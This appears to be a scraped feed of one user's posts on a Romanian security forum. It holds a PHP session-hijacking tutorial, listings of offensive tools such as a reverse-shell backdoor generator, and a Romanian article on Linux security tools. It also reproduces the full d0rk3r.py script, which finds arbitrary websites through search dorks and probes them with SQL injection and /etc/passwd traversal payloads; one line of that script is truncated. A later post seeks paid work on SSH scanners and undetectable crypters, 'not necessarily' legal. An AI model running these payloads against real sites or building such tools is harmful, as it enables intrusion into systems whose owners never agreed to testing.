Nytro

Session Hijacking Basics __ _ _ _ _ _ / _\ ___ ___ ___(_) ___ _ __ /\ /(_)(_) __ _ ___| | _(_)_ __ __ _ \ \ / _ \/ __/ __| |/ _ \| '_ \ / /_/ / || |/ _` |/ __| |/ / | '_ \ / _` | _\ \ __/\__ \__ \ | (_) | | | | / __ /| || | (_| | (__| <| | | | | (_| | \__/\___||___/___/_|\___/|_| |_| \/ /_/ |_|/ |\__,_|\___|_|\_\_|_| |_|\__, | |__/ |___/ Basic # language: English # Title: Session Hijacking Basic # Date: 2011-01-13 # Author: Filipe Barros/@barros_filipe | +01 - Session Fixation | +02 - Session Hijacking | +03 - Firesheep Have fun ====== +01 - Session Fixation ====== The attacker attempts to gain access to another user's session by posing as that user. The information for an attacker is the session identifier, because this is required for any impersonation attack. There are three common methods used to obtain a valid session identifier: * Fixation * Capture * Prediction Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation. Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been Internet Explorer, and cookies are slightly less exposed than GET variables. for those users who enable cookies, you can provide them with a more secure mechanism by using a cookie to propagate the session. Fixation is the simplest method of obtaining a valid session identifier. While it's not very difficult to defend against, if your session mechanism consists of nothing more than session_start(), you are vulnerable. To demonstrate session fixation, I'll use the following script, session-hijacking.php: [ Begin PHP CODE ] <?php session_start(); if (!isset($_SESSION['visits'])) { $_SESSION['visits'] = 1; } else { $_SESSION['visits']++; } echo $_SESSION['visits']; ?> [ End PHP CODE ] First make sure that you do not have an existing session identifier (perhaps delete your cookies), then visit this page with ?PHPSESSID=123456789 appended to the URL. Next, with a completely different browser (or even a completely different computer), visit the same URL again with ?PHPSESSID=123456789 appended. You will notice that you do not see 1 output on your first visit, but rather it continues the session you previously initiated. If there isn't an active session associated with a session identifier that the user is presenting, then regenerate it just to be sure: [ Begin PHP CODE ] <?php session_start(); if (!isset($_SESSION['initiated'])) { session_regenerate_id(); $_SESSION['initiated'] = true; } ?> [ End PHP CODE ] The problem with such a simplistic defense is that an attacker can simply initialize a session for a particular session identifier and then use that identifier to launch the attack. ====== +02 - Session Hijacking ====== If your session mechanism have only session_start(), you are vulnerable. With the most simplistic session mechanism, a valid session identifier is all that is needed to successfully hijack a session. In order to improve this, we need to see if there is anything extra in an HTTP request that we can use for extra identification. Recall a typical HTTP request: GET / HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Gecko Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=123456789 Only the Host header is required by HTTP/1.1, so it seems unwise to rely on anything else. However, consistency is really all we need, because we're only interested in complicating impersonation without adversely affecting legitimate users. Imagine that the previous request is followed by a request with a different User-Agent: GET / HTTP/1.1 Host: example.com User-Agent: Mozilla Compatible (MSIE) Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=123456789 Although the same cookie is presented, should it be assumed that this is the same user? It seems highly unlikely that a browser would change the User-Agent header between requests, right? Let's modify the session mechanism to perform an extra check: [ Begin PHP CODE ] <?php session_start(); if (isset($_SESSION['HTTP_USER_AGENT'])) { if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) { /* Prompt for password */ exit; } } else { $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']); } ?> [ End PHP CODE ] Now an attacker must not only present a valid session identifier, but also the correct User-Agent header that is associated with the session. This complicates things slightly, and it is therefore a bit more secure. Imagine if we required the user to pass the MD5 of the User-Agent in each request. An attacker could no longer just recreate the headers that the victim's requests contain, but it would also be necessary to pass this extra bit of information. While guessing the construction of this particular token isn't too difficult, we can complicate such guesswork by simply adding an extra bit of randomness to the way we construct the token: <?php $string = $_SERVER['HTTP_USER_AGENT']; $string .= 'SHIFLETT'; /* Add any other data that is consistent */ $fingerprint = md5($string); ?> Keeping in mind that we're passing the session identifier in a cookie, and this already requires that an attack be used to compromise this cookie (and likely all HTTP headers as well), we should pass this fingerprint as a URL variable. This must be in all URLs as if it were the session identifier, because both should be required in order for a session to be automatically continued (in addition to all checks passing). In order to make sure that legitimate users aren't treated like criminals, simply prompt for a password if a check fails. If there is an error in your mechanism that incorrectly suspects a user of an impersonation attack, prompting for a password before continuing is the least offensive way to handle the situation. In fact, your users may appreciate the extra bit of protection perceived from such a query. There are many different methods you can use to complicate impersonation and protect your applications from session hijacking. Hopefully you will at least do something in addition to session_start() as well as be able to come up with a few ideas of your own. ====== +03 - Firesheep ====== Recently a firefox extension called Firesheep has exploited and made it easy for public wifi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the firesheep user to easily access private information from cookies and threaten the public wifi users personal property. Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way. Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win. Thanks! Sursa: http://packetstormsecurity.org/files/view/97548/session-hijackbasic.txt

yInjector MySQL Injection Tool yInjector is a MySQL injection penetration tool. It has multiple features, proxy support, and multiple exploitation methods. Download: http://dl.packetstormsecurity.net/UNIX/scanners/yInjector.tar.gz Detalii: http://y-osirys.com/softwares/#subsec=m-softwares,id=10,title=yInjector%20-%20SQL%20Inj%20Penetration%20Tool

Mptcp Packet Manipulator 1.7 Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address. Download: http://dl.packetstormsecurity.net/UNIX/scanners/mptcp-1.7-en.tar.gz Detalii: http://www.hexcodes.org/mptcp.i

yCrawler Web Crawling Utility YCrawler is a web crawler that is useful for grabbing all user supplied input related to a given website and will save the output. It has proxy and log file support. Download: http://dl.packetstormsecurity.net/UNIX/scanners/yCrawler.tar.gz Detalii: http://y-osirys.com/

XSSer Penetration Testing Tool 1.5-1 XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications. It contains several options to try to bypass certain filters, and various special techniques of code injection. Download: http://dl.packetstormsecurity.net/UNIX/scanners/xsser_1.5-1.tar.gz Detalii: http://sourceforge.net/projects/xsser/

WATOBO Web Application Toolbox Auditor 0.9.6rev266 WATOBO, the Web Application Toolbox, is a tool that enables security professionals to perform highly efficient (semi-automated) web application security audits. It acts like a local proxy and analyzes the traffic on the fly for helpful information and vulnerabilities. It also has automated scanning capabilities, e.g. SQL injection, cross site scripting and more. Changes: Now supports one-time tokens. NTLM authentication added. FileFinder plugin added. Various other additions. Download: http://dl.packetstormsecurity.net/UNIX/scanners/watobo_0.9.6rev266.zip Detalii: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page

Scapy Packet Manipulation Tool 2.2.0 Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc. Changes: This release adds a contrib section filled with old contributions that were not distributed with Scapy yet: CDP, IGMP, MPLS, CHDLC, SLARP, WPA EAPOL, DTP, EIGRP, VQP, BGP, OSPF, VTP RSVP, EtherIP, RIPng, and IKEv2. It fixes some bugs. Download: http://dl.packetstormsecurity.net/UNIX/scanners/scapy-2.2.0.tar.gz Detalii: https://www.secdev.org/projects/scapy/

d0rk3r Local File Inclusion / SQL Injection Scanner d0rk3r is a python script that uses search engines to find sites vulnerable to SQL injection and local file inclusion issues. #!/usr/bin/python # This was written for educational purpose and pentest only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : d0rk3r.py # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com> # Version : 0.1 # About : No proxy support in this version, will put it in next one ... # Greetz for rsauron and low1z, great python coders # greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org # # # Example of use : ./d0rk3r.py -i id= -s com -c redfront -f php -m 500 # U have two options, SQLi or LFI scanning . # When found site vuln to sqli, then it try to find number of columns # After scanning check d0rk3r.txt for more info import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, time from random import choice from optparse import OptionParser if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) colMax = 20 log = "d0rk3r.txt" logfile = open(log, "a") threads = [] numthreads = 1 lfinumthreads =8 timeout = 4 socket.setdefaulttimeout(timeout) W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; rSA = [2,3,4,5,6] CXdic = {'blackle': '013269018370076798483:gg7jrrhpsy4', 'ssearch': '008548304570556886379:0vtwavbfaqe', 'redfront': '017478300291956931546:v0vo-1jh2y4', 'bitcomet': '003763893858882295225:hz92q2xruzy', 'dapirats': '002877699081652281083:klnfl5og4kg', 'darkc0de': '009758108896363993364:wnzqtk1afdo', 'googuuul': '014345598409501589908:mplknj4r1bu'} SQLeD = {'MySQL': 'error in your SQL syntax', 'Oracle': 'ORA-01756', 'MiscError': 'SQL Error', 'MiscError2': 'mysql_fetch_row', 'MiscError3': 'num_rows', 'JDBC_CFM': 'Error Executing Database Query', 'JDBC_CFM2': 'SQLServer JDBC Driver', 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', 'MSSQL_Uqm': 'Unclosed quotation mark', 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', 'MS-Access_JETdb': 'Microsoft JET Database'} lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"] filetypes = ['php','php5','asp','aspx','jsp','htm','html','cfm'] header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'] gnum = 100 def logo(): print G+"\n|---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 02/2011 d0rk3r.py v.0.1 |" print "| |" print "|---------------------------------------------------------------|\n" print "\n[-] %s\n" % time.strftime("%X") def cxeSearch(go_inurl,go_site,go_cxe,go_ftype,maxc): uRLS = [] counter = 0 while counter < int(maxc): jar = cookielib.FileCookieJar("cookies") query = 'q='+go_inurl+'+'+go_site+'+'+go_ftype results_web = 'http://www.google.com/cse?'+go_cxe+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N' request_web = urllib2.Request(results_web) agent = random.choice(header) request_web.add_header('User-Agent', agent) opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) text = opener_web.open(request_web).read() strreg = re.compile('(?<=href=")(.*?)(?=")') names = strreg.findall(text) counter += 100 for name in names: if name not in uRLS: if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name): pass elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name): pass else: uRLS.append(name) tmpList = []; finalList = [] print "[+] URLS (unsorted) :", len(uRLS) for entry in uRLS: try: t2host = entry.split("/",3) domain = t2host[2] if domain not in tmpList and "=" in entry: finalList.append(entry) tmpList.append(domain) except: pass print "[+] URLS (sorted) :", len(finalList) return finalList class injThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts;self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicINJ(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False class lfiThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts;self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicLFI(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in SQLeD.items(): if re.search(eMSG, source): print R+"\nw00t!,w00t!:", O+host, B+"Error:", type #logfile.write("\n"+host) findcol(url) else: pass except: pass def findcol(url): print "\n[+] Attempting to find the number of columns ..." checkfor = [] firstgo = "True" site = url+"+and+1=2+union+all+select+" makepretty = "" for a in xrange(0,colMax): darkc0de = "dark"+str(a)+"c0de" checkfor.append(darkc0de) if firstgo == "True": site = site+"0x"+darkc0de.encode("hex") firstgo = "False" else: site = site+",0x"+darkc0de.encode("hex") finalurl = site+"--" source = urllib2.urlopen(finalurl).read() for b in checkfor: colFound = re.findall(b,source) if len(colFound) >= 1: print "\n[+] Column Length is:",len(checkfor) b = re.findall(("\d+"), print "[+] Found null column at column #:",b[0] firstgo = "True:" for c in xrange(0,len(checkfor)): if firstgo == "True": makepretty = makepretty+str(c) firstgo = "False" else: makepretty = makepretty+","+str(c) print "[+] Site URL:",url+"+and+1=2+union+all+select+"+makepretty+"--" url = url+"+and+1=2+union+all+select+"+makepretty+"--" url = url.replace(","+b[0]+",",",darkc0de,") url = url.replace("+"+b[0]+",","+"+"darkc0de,") url = url.replace(","+b[0],",darkc0de") print "[+] darkc0de URL:",url logfile.write("\n"+url) def ClassicLFI(url): lfiurl = url.rsplit('=' ,1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: print G+"[+] Checking:",lfiurl+lfi.replace("\n", "") #print try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"w00t!,w00t!: ", O+lfiurl+lfi logfile.write("\n"+lfiurl+lfi) except: pass parser = OptionParser() parser.add_option("-i" ,type='string', dest='inurl',action='store', default="0wn3d_by_baltazar", help="inurl: operator") parser.add_option("-s", type='string', dest='site',action='store', default="com", help="site: operator") parser.add_option("-c", type='string', dest='cxe',action='store', default='redfront', help="custom search engine (blackle,ssearch,redfront,bitcomet,dapirats,darkc0de,googuuul)") parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="server side language filetype") parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="max results (default 500)") (options, args) = parser.parse_args() logo() if options.inurl != None: print B+"[+] inurl :",options.inurl go_inurl = 'inurl:'+options.inurl if options.inurl != None: if options.filetype in filetypes: print "[+] filetype :",options.filetype go_ftype = 'inurl:'+options.filetype else: print "[+] inurl-filetype : php" go_ftype = 'inurl:php' if options.site != None: print "[+] site :",options.site go_site = 'site:'+options.site if options.cxe != None: if options.cxe in CXdic.keys(): print "[+] CXE :",CXdic[options.cxe] ccxe = CXdic[options.cxe] else: print "[-] CXE : no Proper CXE defined, using redfront" ccxe = CXdic['redfront'] go_cxe = 'cx='+ccxe print "[+] MaxRes :",options.maxcount cuRLS = cxeSearch(go_inurl,go_site,go_cxe,go_ftype,options.maxcount) mnu = True while mnu == True: print G+"\n[1] Injection Testing" print "[2] LFI Testing" print "[0] Exit\n" chce = raw_input(":") if chce == '1': print "\n[+] Preparing for SQLi scanning ... " print "[+] Can take a while ..." print "[!] Working ...\n" i = len(cuRLS) / int(numthreads) m = len(cuRLS) % int(numthreads) z = 0 if len(threads) <= numthreads: for x in range(0, int(numthreads)): sliced = cuRLS[x*i:(x+1)*i] if (z < m): sliced.append(cuRLS[int(numthreads)*i+z]) z += 1 thread = injThread(sliced) thread.start() threads.append(thread) for thread in threads: thread.join() if chce == '2': print "\n[+] Preparing for LFI scanning ... " print "[+] Can take a while ..." print "[!] Working ...\n" i = len(cuRLS) / int(lfinumthreads) m = len(cuRLS) % int(lfinumthreads) z = 0 if len(threads) <= lfinumthreads: for x in range(0, int(lfinumthreads)): sliced = cuRLS[x*i:(x+1)*i] if (z < m): sliced.append(cuRLS[int(lfinumthreads)*i+z]) z += 1 thread = lfiThread(sliced) thread.start() threads.append(thread) for thread in threads: thread.join() if chce == '0': print R+"\n[-] Exiting ..." mnu = False Download: http://dl.packetstormsecurity.net/UNIX/scanners/d0rk3r.py.txt

Multi Threaded TCP Port Scanner 1.3 This is a basic TCP SYN scanner that is multi-threaded. (Linux) Download: http://dl.packetstormsecurity.net/UNIX/scanners/threaded-port-scanner-1.3.zip

USBsploit 0.6 USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework. Changes: Various updates and some bug fixes. Download: http://dl.packetstormsecurity.net/UNIX/utilities/usbsploit-0.6-BETA-linux-i686.tar.gz Informatii: http://secuobs.com/

WhatWeb Scanner 0.4.7 WhatWeb is a next-generation web scanner. It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, identifies version numbers, email addresses, account ID's, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade off between speed and reliability. Changes: Performance enhancements and bug fixes. Download: http://dl.packetstormsecurity.net/UNIX/scanners/whatweb-0.4.7.tar.gz Informatii complete: http://www.morningstarsecurity.com/research/whatweb

Google Hack DB Tool 1.0 Google Hack DB Tool is a database tool with almost 8,000 entries. It allows administrators the ability to check their site for vulnerabilities based on data stored in Google. Dorks... Download: http://dl.packetstormsecurity.net/UNIX/scanners/google-hack-db-tool-1.0.zip

Ban majoritatea. De ce pula mea comentati aiurea? Asta ca idee, ca pe viitor sa nu mai comentati, nici voi si nici altii aiurea, doar ca sa va aflati in treaba.

Pax, esti mai rau (in sensul naspa) pe zi ce trece, ma dezamagesti...

Oare si cei de la Adobe Romania sunt niste mediocri? Robotzi (CreativeMonkeyz care fac MO si F.O.C.A) in vizita la Adobe Romania : Despre Adobe Romania Dar na, cei de la Adobe Romania nu se pot ridica la nivelul vostru.

Cum ma asteptam, raspunsuri inutile de la mari infractori... Ce anume vrei sa stii? Probele fizice sunt usor de luat, dar cele scrise sunt extrem de urate.

si maneaua distreaza, asta o face laudabila? Da, de ce nu? Sa nu pornim un "manele vs orice alt gen muzical"... creatorii de la robotzi tampesc si mai mult prostimea Nu o tampesc ei. Dar na, probabil nu toti sunt oameni de cultura ca tine si multe alte personaje de aici. daca cineva se amuza cand un robot trage o basina Aici e discutabila treaba, de exemplu pe tine ce te amuza? Sunt curios ce o sa imi raspunzi...

Ce "gluma", foarte inteligenta... Ma bucur ca ti-am descoperit IQ-ul. Ar trebui sa ma simt prost? Nu prea ma simt. Dimpotriva, eu cred ca mi-am facut datoria, am facut ce trebuia.

15 unelte de securitate pentru Linux Publicat luni, 20 iulie 2009 n articolul de astazi, va prezentam 15 unelte de securitate pentru sisteme Linux / UNIX. Mentionam ca majoritatea acestor unelte sunt disponibile si pentru alte sisteme de operare cum ar fi Microsoft Windows. Recomandam ca aplicatiile / uneltele prezentate in acest articol sa fie utilizate NUMAI in scopuri constructive si/sau educative! 1. Nmap Security Scanner Nmap “Network Mapper” este, probabil, cel mai cunoscut si mai utilizat port-scanner. Nmap este capabil sa descopere detalii importante despre sistemele din retea cum ar fi: - aplicatii si porturi TCP/UDP “deschise”, utilizate de respectivele aplicatii - versiunile exacte ale serviciilor si aplicatiilor active - sistemele de operare: Nmap poate recunoaste de la distanta tipurile si versiunile sistemelor de operare, aceasta tehnica fiind numita OS Fingerprinting. 2. Nessus Nessus este un scanner de vulnerabilitati extrem de raspandit, fiind utilizat de peste 90.000 organizatii la nivel mondial. Nessus este capabil sa identifice de la distanta potentialele vulnerabilitati de pe sisteme. Pe langa vulnerabilitati, Nessus poate identifica si problemele de configurare care pot duce la propagarea unor probleme de functionalitate ale sistemelor si ale retelelor. 3. Wireshark Wireshark, cunoscut in trecut cu numele Ethereal, este un utilitar de tip “packet sniffer” ce poate fi utilizat pentru interceptarea comunicatiilor din retea. Wireshark permite analiza in timp real a comunicatiilor din retea, fiind similar ca si functionalitate cu tcpdump, totusi Wireshark fiind mai “prietenos” datorita interfetei GUI. Wireshark este disponibil pe mai multe platforme, atat Linux / Unix cat si Windows sau Mac OS X. 4. Ettercap Ettercap este un alt utilitar de tip “packet sniffer” capabil sa intercepteze traficul din retea si sa filtreze traficul “sensibil”, capturand astfel parole transmise “in clar” (necriptate) cum ar fi cele ale comunicatiilor E-Mail POP3, IMAP sau ale sesiunilor Telnet. Ettercap poate fi rulat atat in consola, in mod text, cat si in mod grafic. 5. Dsniff Dsniff este un alt utilitar de tip “packet sniffer” ce poate fi utilizat pentru interceptarea informatiilor sensibile ce traverseaza reteaua cum ar fi: nume utilizatori si parole, pagini Web ce au fost accesate de catre utilizatori, continutul mesajelor E-Mail etc 6. Metasploit Framework Metasploit Framework este o platforma de testare si utilizare a exploiturilor. Metasploit Framework contine o colectie impresionanta de exploit-uri ce pot fi utilizate pentru testarea intruziva a vulnerabilitatilor din retea. 7. Nikto Nikto este un scanner de vulnerabilitati Web, capabil sa identifice cateva mii de potentiale vulnerabilitati ale aplicatiilor si serverelor Web. Nikto este, de asemenea, capabil sa identifice atat versiunea serverului Web scanat cat si modulele / extensiile Web active ca de exemplu: mod_ssl, mod_perl, mod_rewrite, WebDAV etc Scanarea de vulnerabilitati nu este intruziva si pot fi generate multe alerte de tip “false positive” (alerte false) datorita modului in care Nikto interpreteaza raspunsurile primite de la serverele scanate. Chiar si asa, este o unealta foarte utila ce nu trebuie sa lipseasca din “arsenalul” unui administrator de server(e) Web sau de securitate. 8. Aircrack-ng Aircrack-ng este un set de utilitare pentru securitatea retelelor wireless 802.11. Aircrack-ng poate fi utilizat pentru a sparge/recupera parole/chei wireless de tip WEP si WPA-PSK. 9. rkhunter / Rootkit Hunter Rootkit Hunter este un utilitar usor de folosit ce ruleaza pe sisteme UNIX / Linux si are scopul de a detecta prezenta rootkit-urilor si a altor unelte nedorite. 10. chkrootkit chkrootkit este un alt utilitar similiar rkhunter, folosit in acelasi scop, de a va asigura ca sistemul nu a fost compromis si nu sunt prezente pe el aplicatii de tip backdoor/rootkit. 11. Snort Snort este o aplicatie de tip Network Intrusion Prevention/ Detection System (IPS/IDS) capabila sa analizeze in timp real traficul din retea – identificand atacurile indreptate impotriva sistemelor, cum ar fi cele de tip buffer-overflow/stack-overflow, SQL Injection, scanarea de porturi si chiar atacurile de tip DoS/DDoS. Snort este, fara indoiala, cel mai raspandit sistem de detectie si prevenire a atacurilor. 12. netcat / nc netcat este un utilitar folosit pentru transmiterea (citire/scriere) datelor in cadrul retelelor, prin protocolul TCP/IP. 13. John the Ripper John the Ripper este un utilitar de tip “password cracking” ce poate fi folosit pentru extragerea parolelor din hash-uri MD5, blowfish, DES, Windows LM si nu numai. Descoperirea parolelor se face prin metode de tip bruteforce si prin utilizarea dictionarelor de parole. John the Ripper este foarte util pentru extragerea parolelor din fisiere de parole (ex: fisierul /etc/shadow) ce au fost obtinute in urma compromiterii unor sisteme. 14. Tripwire Tripwire este un utilitar pentru monitorizarea integritatii sistemului de fisiere de pe servere sau statii de lucru. Tripwire poate atentiona administratorii atunci cand fisierele importante au fost modificate, corupte sau inlaturate. 15. Backtrack Nu in ultimul rand, amintim o distributie Linux in care sunt inglobate majoritatea uneltelor amintite mai sus, plus multe altele. Backtrack este o distributie Linux dedicata analizei de securitate si a testelor de penetrare / penetration testing. Backtrack contine o colectie mare si variata de unelte de securitate ce pot fi folosite pentru identificarea, analiza si exploatarea propriu-zisa a vulnerabilitatilor din cadrul retelelor. Sursa: http://www.netsecinteractive.ro/blog/15-unelte-de-securitate-pentru-linux.html

Sincer, nu ma incanta. Imi plac, dar serialul nu e cine stie ce. Insa ii admir pentru ca fac ceva, nu doar comenteaza aiurea. Pot sa jur ca toti care au comentat aici au vazut toate episoadele. Daca sunteti diferiti de majoritatea, majoritatea fiind admiratori ai acestui serial, de ce va uitati la el? Daca va uitati toata ziua la videoclipuri si imagini amuzante si cititi tone de bancuri sau mai stiu eu ce e normal sa nu vi se para amuzant... Si pot sa jur ca majoritatea nu au facut nimic util pentru "societate" sa zicem. Oamenilor le place serialul, ii face sa rada, sau cel putin sa zambeasca, sa se destinda. Lumea nu se uita neaparat ca sa pice pe jos de ras, in ziua de azi e destul de greu sa amuzi pe cineva, multi "le stiu pe toate". Si important e ca nu cer bani pentru asta.

Ei macar distreaza o gramada de oameni, voi consumati oxigenul degeaba pe planeta.

Adobe Affter Effects cred. Desigur, folosind Photoshop înainte.

Mosad: Are vreun rost daca fac o singura versiune? Adica daca nu fac 1000 de stuburi? Desi as putea incerca si eu as vrea sa incerc ceva mai "extrem"... demisec: In mare nu ar trebui sa fie dificil, oricum vreau de mult sa studiez in detaliu acest protocol, dar pot aparea multe probleme cu diverse servere. robertutzu: Cum m-as imbogati din asa ceva? Si ce anume sa fac mai exact? F.A.Q.: Nu stiu nici macar jQuery, nu sunt tocmai expert, deci nu cred ca e de mine... sharkyz: Nu e deloc usor...

Vreau doar niste idei. As vrea sa fac niste proiecte din care sa iasa bani si nu am idee ce se cauta. Singurele lucruri care imi trec in momentul de fata prin cap sunt: - SMTP scanner - SSH scanner (ala cu "root"-urile voastre) - Crypter FUD ................................ Voi ce pareri aveti? Pentru ce si cat anume ati plati? E cineva care are nevoie de un proiect si ar plati pentru el? Bine, nu lucruri marunte de 5 - 10 euro, ceva mai complex. Si ar fi de preferat sa fie cat mai legal, dar nu neaparat. Nu imi trebuie bani, dar vreau sa imi fac cateva idei, am de luat niste decizii... PS: Daca am oferte serioase ma bag. Daca e cineva un freelancer activ pe diverse site-uri, poate ma ajuta cu niste sfaturi. Merge treaba? Cat de greu e la inceput? Cat de greu se prinde un proiect si cam cat se castiga din ele? Aria mea de interese: Web (PHP/MySQL/HTML/JavaScript, nu Design), Desktop (Visual Basic, C++), Linux (C++)...

Problema e de dinainte de 1 aprilie. Cred ca mai intai incearca sa posteze prin AJAX si chiar daca reuseste sau nu, mai incearca o data. Habar nu am, daca nu am ce face ma uit prin cod.